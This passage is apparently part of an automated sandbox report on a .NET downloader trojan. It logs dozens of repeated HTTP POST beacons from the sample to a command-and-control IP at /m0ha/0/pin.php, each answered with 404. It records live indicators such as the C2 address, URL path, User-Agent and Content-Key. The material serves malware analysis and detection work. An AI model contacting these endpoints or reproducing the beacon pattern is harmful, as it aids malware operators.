                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:17.987251043 CET | 1174 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:17 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 24 | Source IP: 192.168.2.5 | Source Port: 49720 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:18.244798899 CET | 1175 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:18.718091965 CET | 1175 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:18 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 49721 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:18.964073896 CET | 1176 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:19.322257996 CET | 1177 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:18 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 26 | Source IP: 192.168.2.5 | Source Port: 49722 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:19.791692972 CET | 1177 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:20.117541075 CET | 1178 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:19 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 49723 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:20.361541986 CET | 1179 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:20.618340969 CET | 1179 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:20 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 49724 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:21.004333973 CET | 1180 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:21.287939072 CET | 1181 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:21 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 29 | Source IP: 192.168.2.5 | Source Port: 49725 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:22.062017918 CET | 1181 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:23.039788008 CET | 1182 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:22 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49698 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:01.352142096 CET | 1135 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:01.791879892 CET | 1136 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:01 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 49726 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:23.293570042 CET | 1183 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:25.291951895 CET | 1183 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:23 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 31 | Source IP: 192.168.2.5 | Source Port: 49727 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:25.581074953 CET | 1184 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:26.542694092 CET | 1185 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:25 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 32 | Source IP: 192.168.2.5 | Source Port: 49728 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:26.790848017 CET | 1185 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:27.122605085 CET | 1186 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:26 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 33 | Source IP: 192.168.2.5 | Source Port: 49729 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:27.364125967 CET | 1187 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:27.610562086 CET | 1188 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:27 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID: 34 | Source IP: 192.168.2.5 | Source Port: 49730 | Destination IP: 87.251.79.157 | Destination Port: 80 | Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:27.852823019 CET | 1188 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:28.146226883 CET | 1189 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:27 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              35 | 192.168.2.5 | 49731 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:28.400491953 CET | 1190 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:28.677202940 CET | 1190 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:28 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              36 | 192.168.2.5 | 49732 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:28.911928892 CET | 1191 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:29.195779085 CET | 1192 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:28 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              37 | 192.168.2.5 | 49733 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:29.450562000 CET | 1192 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:29.706804037 CET | 1193 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:29 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              38 | 192.168.2.5 | 49734 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:29.958482027 CET | 1194 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:30.265338898 CET | 1194 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:29 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              39 | 192.168.2.5 | 49735 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:30.516411066 CET | 1195 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:30.769006014 CET | 1196 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:30 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              4 | 192.168.2.5 | 49699 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:02.461606026 CET | 1136 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:02.822240114 CET | 1137 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:02 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              40 | 192.168.2.5 | 49736 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:31.008223057 CET | 1196 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:31.407385111 CET | 1197 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:31 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              41 | 192.168.2.5 | 49737 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:31.655733109 CET | 1198 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:32.298558950 CET | 1198 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:31 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              42 | 192.168.2.5 | 49738 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:32.541887045 CET | 1199 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:33.109786034 CET | 1200 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:32 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              43 | 192.168.2.5 | 49739 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:33.365221024 CET | 1200 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:33.615084887 CET | 1201 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:33 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              44 | 192.168.2.5 | 49740 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:33.848928928 CET | 1202 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:34.100250959 CET | 1202 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:33 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              45 | 192.168.2.5 | 49741 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:34.358577967 CET | 1203 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:34.628392935 CET | 1204 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:34 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              46 | 192.168.2.5 | 49742 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:34.878601074 CET | 1204 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
